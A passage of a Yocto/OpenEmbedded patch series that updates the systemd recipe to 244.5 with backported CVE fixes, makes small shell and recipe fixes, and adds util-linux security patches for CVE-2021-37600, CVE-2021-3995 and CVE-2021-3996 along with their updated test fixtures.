-It happens since 25de7aa7b90 (Yu Watanabe 2019-04-25 01:21:11 +0200)
-when udev rules processing changed to token model. Yu forgot store
-attr to SECLABEL token so fix it.
----
- src/udev/udev-rules.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-Upstream-Status: Backport [https://github.com/systemd/systemd/commit/0335d110afc08baf47d76b7011ce02510dfdd524.patch]
----
-diff --git a/src/udev/udev-rules.c b/src/udev/udev-rules.c
-index b9b350d1ef..b990f68e93 100644
---- a/src/udev/udev-rules.c
-+++ b/src/udev/udev-rules.c
-@@ -921,7 +921,7 @@ static int parse_token(UdevRules *rules, const char *key, char *attr, UdevRuleOp
- op = OP_ASSIGN;
- }
-
-- r = rule_line_add_token(rule_line, TK_A_SECLABEL, op, value, NULL);
-+ r = rule_line_add_token(rule_line, TK_A_SECLABEL, op, value, attr);
- } else if (streq(key, "RUN")) {
- if (is_match || op == OP_REMOVE)
- return log_token_invalid_op(rules, key);
diff --git a/meta/recipes-core/systemd/systemd_244.3.bb b/meta/recipes-core/systemd/systemd_244.5.bb
index 64e3b18333..8b2f47b92f 100644
--- a/meta/recipes-core/systemd/systemd_244.3.bb
+++ b/meta/recipes-core/systemd/systemd_244.5.bb
@@ -18,10 +18,28 @@ SRC_URI += "file://touchscreen.rules \
file://00-create-volatile.conf \
file://init \
file://99-default.preset \
+ file://systemd-pager.sh \
file://0001-binfmt-Don-t-install-dependency-links-at-install-tim.patch \
file://0003-implment-systemd-sysv-install-for-OE.patch \
- file://CVE-2020-13776.patch \
- file://systemd-udev-seclabel-options-crash-fix.patch \
+ file://CVE-2021-33910.patch \
+ file://CVE-2020-13529.patch \
+ file://basic-pass-allocation-info-for-ordered-set-new-and-introd.patch \
+ file://introduce-ordered_set_clear-free-with-destructor.patch \
+ file://network-add-skeleton-of-request-queue.patch \
+ file://network-merge-link_drop-and-link_detach_from_manager.patch \
+ file://network-also-drop-requests-when-link-enters-linger-state.patch \
+ file://network-fix-Link-reference-counter-issue.patch \
+ file://rm-rf-refactor-rm-rf-children-split-out-body-of-directory.patch \
+ file://rm-rf-optionally-fsync-after-removing-directory-tree.patch \
+ file://CVE-2018-21029.patch \
+ file://CVE-2021-3997-1.patch \
+ file://CVE-2021-3997-2.patch \
+ file://CVE-2021-3997-3.patch \
+ file://CVE-2022-3821.patch \
+ file://CVE-2023-26604-1.patch \
+ file://CVE-2023-26604-2.patch \
+ file://CVE-2023-26604-3.patch \
+ file://CVE-2023-26604-4.patch \
"
# patches needed by musl
@@ -51,6 +69,9 @@ SRC_URI_MUSL = "\
file://0004-src-shared-cpu-set-util.h-add-__cpu_mask-definition.patch \
"
+# already applied in 244.5
+CVE_CHECK_WHITELIST += "CVE-2020-13776"
+
PAM_PLUGINS = " \
pam-plugin-unix \
pam-plugin-loginuid \
@@ -87,6 +108,7 @@ PACKAGECONFIG ??= " \
timesyncd \
utmp \
vconsole \
+ wheel-group \
xz \
"
@@ -147,6 +169,7 @@ PACKAGECONFIG[manpages] = "-Dman=true,-Dman=false,libxslt-native xmlto-native do
PACKAGECONFIG[microhttpd] = "-Dmicrohttpd=true,-Dmicrohttpd=false,libmicrohttpd"
PACKAGECONFIG[myhostname] = "-Dnss-myhostname=true,-Dnss-myhostname=false,,libnss-myhostname"
PACKAGECONFIG[networkd] = "-Dnetworkd=true,-Dnetworkd=false"
+PACKAGECONFIG[no-dns-fallback] = "-Ddns-servers="
PACKAGECONFIG[nss] = "-Dnss-systemd=true,-Dnss-systemd=false"
PACKAGECONFIG[nss-mymachines] = "-Dnss-mymachines=true,-Dnss-mymachines=false"
PACKAGECONFIG[nss-resolve] = "-Dnss-resolve=true,-Dnss-resolve=false"
@@ -179,6 +202,7 @@ PACKAGECONFIG[sbinmerge] = "-Dsplit-bin=false,-Dsplit-bin=true"
PACKAGECONFIG[utmp] = "-Dutmp=true,-Dutmp=false"
PACKAGECONFIG[valgrind] = "-DVALGRIND=1,,valgrind"
PACKAGECONFIG[vconsole] = "-Dvconsole=true,-Dvconsole=false,,${PN}-vconsole-setup"
+PACKAGECONFIG[wheel-group] = "-Dwheel-group=true, -Dwheel-group=false"
# Verify keymaps on locale change
PACKAGECONFIG[xkbcommon] = "-Dxkbcommon=true,-Dxkbcommon=false,libxkbcommon"
PACKAGECONFIG[xz] = "-Dxz=true,-Dxz=false,xz"
@@ -196,10 +220,12 @@ rootlibexecdir = "${rootprefix}/lib"
EXTRA_OEMESON += "-Dlink-udev-shared=false"
EXTRA_OEMESON += "-Dnobody-user=nobody \
- -Dnobody-group=nobody \
+ -Dnobody-group=nogroup \
-Drootlibdir=${rootlibdir} \
-Drootprefix=${rootprefix} \
-Ddefault-locale=C \
+ -Dsystem-uid-max=999 \
+ -Dsystem-gid-max=999 \
"
# Hardcode target binary paths to avoid using paths from sysroot
@@ -297,6 +323,9 @@ do_install() {
# install default policy for presets
# https://www.freedesktop.org/wiki/Software/systemd/Preset/#howto
install -Dm 0644 ${WORKDIR}/99-default.preset ${D}${systemd_unitdir}/system-preset/99-default.preset
+
+ # add a profile fragment to disable systemd pager with busybox less
+ install -Dm 0644 ${WORKDIR}/systemd-pager.sh ${D}${sysconfdir}/profile.d/systemd-pager.sh
}
python populate_packages_prepend (){
@@ -384,9 +413,9 @@ FILES_${PN}-binfmt = "${sysconfdir}/binfmt.d/ \
${rootlibexecdir}/systemd/systemd-binfmt \
${systemd_unitdir}/system/proc-sys-fs-binfmt_misc.* \
${systemd_unitdir}/system/systemd-binfmt.service"
-RRECOMMENDS_${PN}-binfmt = "kernel-module-binfmt-misc"
+RRECOMMENDS_${PN}-binfmt = "${@bb.utils.contains('PACKAGECONFIG', 'binfmt', 'kernel-module-binfmt-misc', '', d)}"
-RRECOMMENDS_${PN}-vconsole-setup = "kbd kbd-consolefonts kbd-keymaps"
+RRECOMMENDS_${PN}-vconsole-setup = "${@bb.utils.contains('PACKAGECONFIG', 'vconsole', 'kbd kbd-consolefonts kbd-keymaps', '', d)}"
FILES_${PN}-journal-gatewayd = "${rootlibexecdir}/systemd/systemd-journal-gatewayd \
@@ -519,6 +548,7 @@ FILES_${PN} = " ${base_bindir}/* \
${sysconfdir}/dbus-1/ \
${sysconfdir}/modules-load.d/ \
${sysconfdir}/pam.d/ \
+ ${sysconfdir}/profile.d/ \
${sysconfdir}/sysctl.d/ \
${sysconfdir}/systemd/ \
${sysconfdir}/tmpfiles.d/ \
diff --git a/meta/recipes-core/sysvinit/sysvinit/rc b/meta/recipes-core/sysvinit/sysvinit/rc
index fd1fdd26ba..d0d3149821 100755
--- a/meta/recipes-core/sysvinit/sysvinit/rc
+++ b/meta/recipes-core/sysvinit/sysvinit/rc
@@ -63,7 +63,7 @@ startup() {
stty onlcr 0>&1
# Limit stack size for startup scripts
- [ "$STACK_SIZE" == "" ] || ulimit -S -s $STACK_SIZE
+ [ "$STACK_SIZE" = "" ] || ulimit -S -s $STACK_SIZE
# Now find out what the current and what the previous runlevel are.
diff --git a/meta/recipes-core/udev/eudev/init b/meta/recipes-core/udev/eudev/init
index 0455ade258..c60dbbf6d5 100644
--- a/meta/recipes-core/udev/eudev/init
+++ b/meta/recipes-core/udev/eudev/init
@@ -52,7 +52,7 @@ case "$1" in
kill_udevd > "/dev/null" 2>&1
# trigger the sorted events
- [ -e /proc/sys/kernel/hotplug ] && echo -e '\000' >/proc/sys/kernel/hotplug
+ [ -e /proc/sys/kernel/hotplug ] && printf '\0\n' >/proc/sys/kernel/hotplug
@UDEVD@ -d
udevadm control --env=STARTUP=1
diff --git a/meta/recipes-core/udev/eudev_3.2.9.bb b/meta/recipes-core/udev/eudev_3.2.9.bb
index f96f8cbe78..3ae91dee51 100644
--- a/meta/recipes-core/udev/eudev_3.2.9.bb
+++ b/meta/recipes-core/udev/eudev_3.2.9.bb
@@ -1,5 +1,6 @@
SUMMARY = "eudev is a fork of systemd's udev"
HOMEPAGE = "https://wiki.gentoo.org/wiki/Eudev"
+DESCRIPTION = "eudev is Gentoo's fork of udev, systemd's device file manager for the Linux kernel. It manages device nodes in /dev and handles all user space actions when adding or removing devices."
LICENSE = "GPLv2.0+ & LGPL-2.1+"
LICENSE_libudev = "LGPL-2.1+"
LIC_FILES_CHKSUM = "file://COPYING;md5=751419260aa954499f7abaabaa882bbe"
diff --git a/meta/recipes-core/update-rc.d/update-rc.d_0.8.bb b/meta/recipes-core/update-rc.d/update-rc.d_0.8.bb
index 75632d9434..daee5c224b 100644
--- a/meta/recipes-core/update-rc.d/update-rc.d_0.8.bb
+++ b/meta/recipes-core/update-rc.d/update-rc.d_0.8.bb
@@ -6,8 +6,8 @@ SECTION = "base"
LICENSE = "GPLv2+"
LIC_FILES_CHKSUM = "file://update-rc.d;beginline=5;endline=15;md5=d40a07c27f535425934bb5001f2037d9"
-SRC_URI = "git://git.yoctoproject.org/update-rc.d"
-SRCREV = "4b150b25b38de688d25cde2b2d22c268ed65a748"
+SRC_URI = "git://git.yoctoproject.org/update-rc.d;branch=master"
+SRCREV = "8636cf478d426b568c1be11dbd9346f67e03adac"
UPSTREAM_CHECK_COMMITS = "1"
diff --git a/meta/recipes-core/util-linux/util-linux.inc b/meta/recipes-core/util-linux/util-linux.inc
index 0e85603d9a..7b780352be 100644
--- a/meta/recipes-core/util-linux/util-linux.inc
+++ b/meta/recipes-core/util-linux/util-linux.inc
@@ -59,12 +59,13 @@ python util_linux_binpackages () {
continue
pkg = os.path.basename(os.readlink(file))
- extras[pkg] = extras.get(pkg, '') + ' ' + file.replace(dvar, '', 1)
+ extras.setdefault(pkg, [])
+ extras[pkg].append(file.replace(dvar, '', 1))
pn = d.getVar('PN')
for pkg, links in extras.items():
of = d.getVar('FILES_' + pn + '-' + pkg)
- links = of + links
+ links = of + " " + " ".join(sorted(links))
d.setVar('FILES_' + pn + '-' + pkg, links)
}
@@ -94,7 +95,7 @@ EXTRA_OECONF = "\
\
--disable-bfs --disable-chfn-chsh --disable-login \
--disable-makeinstall-chown --disable-minix --disable-newgrp \
- --disable-use-tty-group --disable-vipw \
+ --disable-use-tty-group --disable-vipw --disable-raw \
\
--without-udev \
\
diff --git a/meta/recipes-core/util-linux/util-linux/CVE-2021-37600.patch b/meta/recipes-core/util-linux/util-linux/CVE-2021-37600.patch
new file mode 100644
index 0000000000..2b306c435b
--- /dev/null
+++ b/meta/recipes-core/util-linux/util-linux/CVE-2021-37600.patch
@@ -0,0 +1,33 @@
+From 1c9143d0c1f979c3daf10e1c37b5b1e916c22a1c Mon Sep 17 00:00:00 2001
+From: Karel Zak <kzak@redhat.com>
+Date: Tue, 27 Jul 2021 11:58:31 +0200
+Subject: [PATCH] sys-utils/ipcutils: be careful when call calloc() for uint64
+ nmembs
+
+Fix: https://github.com/karelzak/util-linux/issues/1395
+Signed-off-by: Karel Zak <kzak@redhat.com>
+
+CVE: CVE-2021-37600
+Upstream-Status: Backport [1c9143d0c1f979c3daf10e1c37b5b1e916c22a1c]
+
+Signed-off-by: Dragos-Marian Panait <dragos.panait@windriver.com>
+---
+ sys-utils/ipcutils.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/sys-utils/ipcutils.c b/sys-utils/ipcutils.c
+index e784c4dcb..18868cfd3 100644
+--- a/sys-utils/ipcutils.c
++++ b/sys-utils/ipcutils.c
+@@ -218,7 +218,7 @@ static void get_sem_elements(struct sem_data *p)
+ {
+ size_t i;
+
+- if (!p || !p->sem_nsems || p->sem_perm.id < 0)
++ if (!p || !p->sem_nsems || p->sem_nsems > SIZE_MAX || p->sem_perm.id < 0)
+ return;
+
+ p->elements = xcalloc(p->sem_nsems, sizeof(struct sem_elem));
+--
+2.25.1
+
diff --git a/meta/recipes-core/util-linux/util-linux/CVE-2021-3995.patch b/meta/recipes-core/util-linux/util-linux/CVE-2021-3995.patch
new file mode 100644
index 0000000000..1dcb66ad1d
--- /dev/null
+++ b/meta/recipes-core/util-linux/util-linux/CVE-2021-3995.patch
@@ -0,0 +1,139 @@
+From f3db9bd609494099f0c1b95231c5dfe383346929 Mon Sep 17 00:00:00 2001
+From: Karel Zak <kzak@redhat.com>
+Date: Wed, 24 Nov 2021 13:53:25 +0100
+Subject: [PATCH] libmount: fix UID check for FUSE umount [CVE-2021-3995]
+
+Improper UID check allows an unprivileged user to unmount FUSE
+filesystems of users with similar UID.
+
+Signed-off-by: Karel Zak <kzak@redhat.com>
+
+CVE: CVE-2021-3995
+Upstream-Status: Backport [https://github.com/util-linux/util-linux/commit/f3db9bd609494099f0c1b95231c5dfe383346929]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ include/strutils.h | 2 +-
+ libmount/src/context_umount.c | 14 +++---------
+ libmount/src/mountP.h | 1 +
+ libmount/src/optstr.c | 42 +++++++++++++++++++++++++++++++++++
+ 4 files changed, 47 insertions(+), 12 deletions(-)
+
+diff --git a/include/strutils.h b/include/strutils.h
+index 6e95707ea9..a84d29594d 100644
+--- a/include/strutils.h
++++ b/include/strutils.h
+@@ -91,8 +91,8 @@ static inline char *mem2strcpy(char *dest, const void *src, size_t n, size_t nma
+ if (n + 1 > nmax)
+ n = nmax - 1;
+
++ memset(dest, '\0', nmax);
+ memcpy(dest, src, n);
+- dest[nmax-1] = '\0';
+ return dest;
+ }
+
+diff --git a/libmount/src/context_umount.c b/libmount/src/context_umount.c
+index 173637a15a..8773c65ffa 100644
+--- a/libmount/src/context_umount.c
++++ b/libmount/src/context_umount.c
+@@ -393,10 +393,7 @@ static int is_fuse_usermount(struct libmnt_context *cxt, int *errsv)
+ struct libmnt_ns *ns_old;
+ const char *type = mnt_fs_get_fstype(cxt->fs);
+ const char *optstr;
+- char *user_id = NULL;
+- size_t sz;
+- uid_t uid;
+- char uidstr[sizeof(stringify_value(ULONG_MAX))];
++ uid_t uid, entry_uid;
+
+ *errsv = 0;
+
+@@ -413,11 +410,7 @@ static int is_fuse_usermount(struct libmnt_context *cxt, int *errsv)
+ optstr = mnt_fs_get_fs_options(cxt->fs);
+ if (!optstr)
+ return 0;
+-
+- if (mnt_optstr_get_option(optstr, "user_id", &user_id, &sz) != 0)
+- return 0;
+-
+- if (sz == 0 || user_id == NULL)
++ if (mnt_optstr_get_uid(optstr, "user_id", &entry_uid) != 0)
+ return 0;
+
+ /* get current user */
+@@ -434,8 +427,7 @@ static int is_fuse_usermount(struct libmnt_context *cxt, int *errsv)
+ return 0;
+ }
+
+- snprintf(uidstr, sizeof(uidstr), "%lu", (unsigned long) uid);
+- return strncmp(user_id, uidstr, sz) == 0;
++ return uid == entry_uid;
+ }
+
+ /*
+diff --git a/libmount/src/mountP.h b/libmount/src/mountP.h
+index d43a835418..22442ec55e 100644
+--- a/libmount/src/mountP.h
++++ b/libmount/src/mountP.h
+@@ -400,6 +400,7 @@ extern const struct libmnt_optmap *mnt_optmap_get_entry(
+ const struct libmnt_optmap **mapent);
+
+ /* optstr.c */
++extern int mnt_optstr_get_uid(const char *optstr, const char *name, uid_t *uid);
+ extern int mnt_optstr_remove_option_at(char **optstr, char *begin, char *end);
+ extern int mnt_optstr_fix_gid(char **optstr, char *value, size_t valsz, char **next);
+ extern int mnt_optstr_fix_uid(char **optstr, char *value, size_t valsz, char **next);
+diff --git a/libmount/src/optstr.c b/libmount/src/optstr.c
+index 921b9318e7..16800f571c 100644
+--- a/libmount/src/optstr.c
++++ b/libmount/src/optstr.c
+@@ -1090,6 +1090,48 @@ int mnt_optstr_fix_user(char **optstr)
+ return rc;
+ }
+
++/*
++ * Converts value from @optstr addressed by @name to uid.
++ *
++ * Returns: 0 on success, 1 if not found, <0 on error
++ */
++int mnt_optstr_get_uid(const char *optstr, const char *name, uid_t *uid)
++{
++ char *value = NULL;
++ size_t valsz = 0;
++ char buf[sizeof(stringify_value(UINT64_MAX))];
++ int rc;
++ uint64_t num;
++
++ assert(optstr);
++ assert(name);
++ assert(uid);
++
++ rc = mnt_optstr_get_option(optstr, name, &value, &valsz);
++ if (rc != 0)
++ goto fail;
++
++ if (valsz > sizeof(buf) - 1) {
++ rc = -ERANGE;
++ goto fail;
++ }
++ mem2strcpy(buf, value, valsz, sizeof(buf));
++
++ rc = ul_strtou64(buf, &num, 10);
++ if (rc != 0)
++ goto fail;
++ if (num > ULONG_MAX || (uid_t) num != num) {
++ rc = -ERANGE;
++ goto fail;
++ }
++ *uid = (uid_t) num;
++
++ return 0;
++fail:
++ DBG(UTILS, ul_debug("failed to convert '%s'= to number [rc=%d]", name, rc));
++ return rc;
++}
++
+ /**
+ * mnt_match_options:
+ * @optstr: options string
diff --git a/meta/recipes-core/util-linux/util-linux/CVE-2021-3996.patch b/meta/recipes-core/util-linux/util-linux/CVE-2021-3996.patch
new file mode 100644
index 0000000000..1610b5a0fe
--- /dev/null
+++ b/meta/recipes-core/util-linux/util-linux/CVE-2021-3996.patch
@@ -0,0 +1,226 @@
+From 018a10907fa9885093f6d87401556932c2d8bd2b Mon Sep 17 00:00:00 2001
+From: Karel Zak <kzak@redhat.com>
+Date: Tue, 4 Jan 2022 10:54:20 +0100
+Subject: [PATCH] libmount: fix (deleted) suffix issue [CVE-2021-3996]
+
+This issue is related to parsing the /proc/self/mountinfo file: it allows
+an unprivileged user to unmount other users' filesystems that are either
+world-writable themselves or mounted in a world-writable directory.
+
+The support for "(deleted)" is no longer necessary as the Linux kernel does
+not use it in the /proc/self/mountinfo and /proc/self/mounts files anymore.
+
+Signed-off-by: Karel Zak <kzak@redhat.com>
+
+CVE: CVE-2021-3996
+Upstream-Status: Backport [https://github.com/util-linux/util-linux/commit/018a10907fa9885093f6d87401556932c2d8bd2b]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ libmount/src/tab_parse.c | 5 -----
+ tests/expected/findmnt/filter-options | 1 -
+ tests/expected/findmnt/filter-options-nameval-neg | 3 +--
+ tests/expected/findmnt/filter-types-neg | 1 -
+ tests/expected/findmnt/outputs-default | 3 +--
+ tests/expected/findmnt/outputs-force-tree | 3 +--
+ tests/expected/findmnt/outputs-kernel | 3 +--
+ tests/expected/libmount/tabdiff-mount | 1 -
+ tests/expected/libmount/tabdiff-move | 1 -
+ tests/expected/libmount/tabdiff-remount | 1 -
+ tests/expected/libmount/tabdiff-umount | 1 -
+ tests/expected/libmount/tabfiles-parse-mountinfo | 11 -----------
+ tests/expected/libmount/tabfiles-py-parse-mountinfo | 11 -----------
+ tests/ts/findmnt/files/mountinfo | 1 -
+ tests/ts/findmnt/files/mountinfo-nonroot | 1 -
+ tests/ts/libmount/files/mountinfo | 1 -
+ 16 files changed, 4 insertions(+), 44 deletions(-)
+
+diff --git a/libmount/src/tab_parse.c b/libmount/src/tab_parse.c
+index 917779ab6d..4407f9c9c7 100644
+--- a/libmount/src/tab_parse.c
++++ b/libmount/src/tab_parse.c
+@@ -225,11 +225,6 @@ static int mnt_parse_mountinfo_line(struct libmnt_fs *fs, const char *s)
+ goto fail;
+ }
+
+- /* remove "\040(deleted)" suffix */
+- p = (char *) endswith(fs->target, PATH_DELETED_SUFFIX);
+- if (p && *p)
+- *p = '\0';
+-
+ s = skip_separator(s);
+
+ /* (6) vfs options (fs-independent) */
+diff --git a/tests/expected/findmnt/filter-options b/tests/expected/findmnt/filter-options
+index 2606bce76b..97b0ead0ad 100644
+--- a/tests/expected/findmnt/filter-options
++++ b/tests/expected/findmnt/filter-options
+@@ -28,5 +28,4 @@ TARGET SOURCE FSTYPE OPTIONS
+ /home/kzak/.gvfs gvfs-fuse-daemon fuse.gvfs-fuse-daemon rw,nosuid,nodev,relatime,user_id=500,group_id=500
+ /var/lib/nfs/rpc_pipefs sunrpc rpc_pipefs rw,relatime
+ /mnt/sounds //foo.home/bar/ cifs rw,relatime,unc=\\foo.home\bar,username=kzak,domain=SRGROUP,uid=0,noforceuid,gid=0,noforcegid,addr=192.168.111.1,posixpaths,serverino,acl,rsize=16384,wsize=57344
+-/mnt/foo /fooooo bar rw,relatime
+ rc=0
+diff --git a/tests/expected/findmnt/filter-options-nameval-neg b/tests/expected/findmnt/filter-options-nameval-neg
+index 5471d65af1..f0467ef755 100644
+--- a/tests/expected/findmnt/filter-options-nameval-neg
++++ b/tests/expected/findmnt/filter-options-nameval-neg
+@@ -29,6 +29,5 @@ TARGET SOURCE FSTYPE OPTIO
+ |-/home/kzak /dev/mapper/kzak-home ext4 rw,noatime,barrier=1,data=ordered
+ | `-/home/kzak/.gvfs gvfs-fuse-daemon fuse.gvfs-fuse-daemon rw,nosuid,nodev,relatime,user_id=500,group_id=500
+ |-/var/lib/nfs/rpc_pipefs sunrpc rpc_pipefs rw,relatime
+-|-/mnt/sounds //foo.home/bar/ cifs rw,relatime,unc=\\foo.home\bar,username=kzak,domain=SRGROUP,uid=0,noforceuid,gid=0,noforcegid,addr=192.168.111.1,posixpaths,serverino,acl,rsize=16384,wsize=57344
+-`-/mnt/foo /fooooo bar rw,relatime
++`-/mnt/sounds //foo.home/bar/ cifs rw,relatime,unc=\\foo.home\bar,username=kzak,domain=SRGROUP,uid=0,noforceuid,gid=0,noforcegid,addr=192.168.111.1,posixpaths,serverino,acl,rsize=16384,wsize=57344
+ rc=0
+diff --git a/tests/expected/findmnt/filter-types-neg b/tests/expected/findmnt/filter-types-neg
+index 2606bce76b..97b0ead0ad 100644
+--- a/tests/expected/findmnt/filter-types-neg
++++ b/tests/expected/findmnt/filter-types-neg
+@@ -28,5 +28,4 @@ TARGET SOURCE FSTYPE OPTIONS
+ /home/kzak/.gvfs gvfs-fuse-daemon fuse.gvfs-fuse-daemon rw,nosuid,nodev,relatime,user_id=500,group_id=500
+ /var/lib/nfs/rpc_pipefs sunrpc rpc_pipefs rw,relatime
+ /mnt/sounds //foo.home/bar/ cifs rw,relatime,unc=\\foo.home\bar,username=kzak,domain=SRGROUP,uid=0,noforceuid,gid=0,noforcegid,addr=192.168.111.1,posixpaths,serverino,acl,rsize=16384,wsize=57344
+-/mnt/foo /fooooo bar rw,relatime
+ rc=0
+diff --git a/tests/expected/findmnt/outputs-default b/tests/expected/findmnt/outputs-default
+index 59495797bd..01599355ec 100644
+--- a/tests/expected/findmnt/outputs-default
++++ b/tests/expected/findmnt/outputs-default
+@@ -30,6 +30,5 @@ TARGET SOURCE FSTYPE OPTIO
+ |-/home/kzak /dev/mapper/kzak-home ext4 rw,noatime,barrier=1,data=ordered
+ | `-/home/kzak/.gvfs gvfs-fuse-daemon fuse.gvfs-fuse-daemon rw,nosuid,nodev,relatime,user_id=500,group_id=500
+ |-/var/lib/nfs/rpc_pipefs sunrpc rpc_pipefs rw,relatime
+-|-/mnt/sounds //foo.home/bar/ cifs rw,relatime,unc=\\foo.home\bar,username=kzak,domain=SRGROUP,uid=0,noforceuid,gid=0,noforcegid,addr=192.168.111.1,posixpaths,serverino,acl,rsize=16384,wsize=57344
+-`-/mnt/foo /fooooo bar rw,relatime
++`-/mnt/sounds //foo.home/bar/ cifs rw,relatime,unc=\\foo.home\bar,username=kzak,domain=SRGROUP,uid=0,noforceuid,gid=0,noforcegid,addr=192.168.111.1,posixpaths,serverino,acl,rsize=16384,wsize=57344
+ rc=0
+diff --git a/tests/expected/findmnt/outputs-force-tree b/tests/expected/findmnt/outputs-force-tree
+index 59495797bd..01599355ec 100644
+--- a/tests/expected/findmnt/outputs-force-tree
++++ b/tests/expected/findmnt/outputs-force-tree
+@@ -30,6 +30,5 @@ TARGET SOURCE FSTYPE OPTIO
+ |-/home/kzak /dev/mapper/kzak-home ext4 rw,noatime,barrier=1,data=ordered
+ | `-/home/kzak/.gvfs gvfs-fuse-daemon fuse.gvfs-fuse-daemon rw,nosuid,nodev,relatime,user_id=500,group_id=500
+ |-/var/lib/nfs/rpc_pipefs sunrpc rpc_pipefs rw,relatime
+-|-/mnt/sounds //foo.home/bar/ cifs rw,relatime,unc=\\foo.home\bar,username=kzak,domain=SRGROUP,uid=0,noforceuid,gid=0,noforcegid,addr=192.168.111.1,posixpaths,serverino,acl,rsize=16384,wsize=57344
+-`-/mnt/foo /fooooo bar rw,relatime
++`-/mnt/sounds //foo.home/bar/ cifs rw,relatime,unc=\\foo.home\bar,username=kzak,domain=SRGROUP,uid=0,noforceuid,gid=0,noforcegid,addr=192.168.111.1,posixpaths,serverino,acl,rsize=16384,wsize=57344
+ rc=0
+diff --git a/tests/expected/findmnt/outputs-kernel b/tests/expected/findmnt/outputs-kernel
+index 59495797bd..01599355ec 100644
+--- a/tests/expected/findmnt/outputs-kernel
++++ b/tests/expected/findmnt/outputs-kernel
+@@ -30,6 +30,5 @@ TARGET SOURCE FSTYPE OPTIO
+ |-/home/kzak /dev/mapper/kzak-home ext4 rw,noatime,barrier=1,data=ordered
+ | `-/home/kzak/.gvfs gvfs-fuse-daemon fuse.gvfs-fuse-daemon rw,nosuid,nodev,relatime,user_id=500,group_id=500
+ |-/var/lib/nfs/rpc_pipefs sunrpc rpc_pipefs rw,relatime
+-|-/mnt/sounds //foo.home/bar/ cifs rw,relatime,unc=\\foo.home\bar,username=kzak,domain=SRGROUP,uid=0,noforceuid,gid=0,noforcegid,addr=192.168.111.1,posixpaths,serverino,acl,rsize=16384,wsize=57344
+-`-/mnt/foo /fooooo bar rw,relatime
++`-/mnt/sounds //foo.home/bar/ cifs rw,relatime,unc=\\foo.home\bar,username=kzak,domain=SRGROUP,uid=0,noforceuid,gid=0,noforcegid,addr=192.168.111.1,posixpaths,serverino,acl,rsize=16384,wsize=57344
+ rc=0
+diff --git a/tests/expected/libmount/tabdiff-mount b/tests/expected/libmount/tabdiff-mount
+index 420aeacd5e..3c18f8dc4f 100644
+--- a/tests/expected/libmount/tabdiff-mount
++++ b/tests/expected/libmount/tabdiff-mount
+@@ -1,3 +1,2 @@
+ /dev/mapper/kzak-home on /home/kzak: MOUNTED
+-/fooooo on /mnt/foo: MOUNTED
+ tmpfs on /mnt/test/foo bar: MOUNTED
+diff --git a/tests/expected/libmount/tabdiff-move b/tests/expected/libmount/tabdiff-move
+index 24f9bc791b..95820d93ef 100644
+--- a/tests/expected/libmount/tabdiff-move
++++ b/tests/expected/libmount/tabdiff-move
+@@ -1,3 +1,2 @@
+ //foo.home/bar/ on /mnt/music: MOVED to /mnt/music
+-/fooooo on /mnt/foo: UMOUNTED
+ tmpfs on /mnt/test/foo bar: UMOUNTED
+diff --git a/tests/expected/libmount/tabdiff-remount b/tests/expected/libmount/tabdiff-remount
+index 82ebeab390..876bfd9539 100644
+--- a/tests/expected/libmount/tabdiff-remount
++++ b/tests/expected/libmount/tabdiff-remount
+@@ -1,4 +1,3 @@
+ /dev/mapper/kzak-home on /home/kzak: REMOUNTED from 'rw,noatime,barrier=1,data=ordered' to 'ro,noatime,barrier=1,data=ordered'
+ //foo.home/bar/ on /mnt/sounds: REMOUNTED from 'rw,relatime,unc=\\foo.home\bar,username=kzak,domain=SRGROUP,uid=0,noforceuid,gid=0,noforcegid,addr=192.168.111.1,posixpaths,serverino,acl,rsize=16384,wsize=57344' to 'ro,relatime,unc=\\foo.home\bar,username=kzak,domain=SRGROUP,uid=0,noforceuid,gid=0,noforcegid,addr=192.168.111.1,posixpaths,serverino,acl,rsize=16384,wsize=57344'
+-/fooooo on /mnt/foo: UMOUNTED
+ tmpfs on /mnt/test/foo bar: UMOUNTED
+diff --git a/tests/expected/libmount/tabdiff-umount b/tests/expected/libmount/tabdiff-umount
+index a3e0fe48a1..c7be725b92 100644
+--- a/tests/expected/libmount/tabdiff-umount
++++ b/tests/expected/libmount/tabdiff-umount
+@@ -1,3 +1,2 @@
+ /dev/mapper/kzak-home on /home/kzak: UMOUNTED
+-/fooooo on /mnt/foo: UMOUNTED
+ tmpfs on /mnt/test/foo bar: UMOUNTED
+diff --git a/tests/expected/libmount/tabfiles-parse-mountinfo b/tests/expected/libmount/tabfiles-parse-mountinfo
+index 47eb770061..d5ba5248e4 100644
+--- a/tests/expected/libmount/tabfiles-parse-mountinfo
++++ b/tests/expected/libmount/tabfiles-parse-mountinfo
+@@ -351,17 +351,6 @@ id: 47
+ parent: 20
+ devno: 0:38
+ ------ fs:
+-source: /fooooo
+-target: /mnt/foo
+-fstype: bar
+-optstr: rw,relatime
+-VFS-optstr: rw,relatime
+-FS-opstr: rw
+-root: /
+-id: 48
+-parent: 20
+-devno: 0:39
+------- fs:
+ source: tmpfs
+ target: /mnt/test/foo bar
+ fstype: tmpfs
+diff --git a/tests/expected/libmount/tabfiles-py-parse-mountinfo b/tests/expected/libmount/tabfiles-py-parse-mountinfo
+index 47eb770061..d5ba5248e4 100644
+--- a/tests/expected/libmount/tabfiles-py-parse-mountinfo
++++ b/tests/expected/libmount/tabfiles-py-parse-mountinfo
+@@ -351,17 +351,6 @@ id: 47
+ parent: 20
+ devno: 0:38
+ ------ fs:
+-source: /fooooo
+-target: /mnt/foo
+-fstype: bar
+-optstr: rw,relatime
+-VFS-optstr: rw,relatime
+-FS-opstr: rw
+-root: /
+-id: 48
+-parent: 20
+-devno: 0:39
+------- fs:
+ source: tmpfs
+ target: /mnt/test/foo bar
+ fstype: tmpfs
+diff --git a/tests/ts/findmnt/files/mountinfo b/tests/ts/findmnt/files/mountinfo
+index 475ea1a337..ff1e664a84 100644
+--- a/tests/ts/findmnt/files/mountinfo
++++ b/tests/ts/findmnt/files/mountinfo
+@@ -30,4 +30,3 @@
+ 44 41 0:36 / /home/kzak/.gvfs rw,nosuid,nodev,relatime - fuse.gvfs-fuse-daemon gvfs-fuse-daemon rw,user_id=500,group_id=500
+ 45 20 0:37 / /var/lib/nfs/rpc_pipefs rw,relatime - rpc_pipefs sunrpc rw
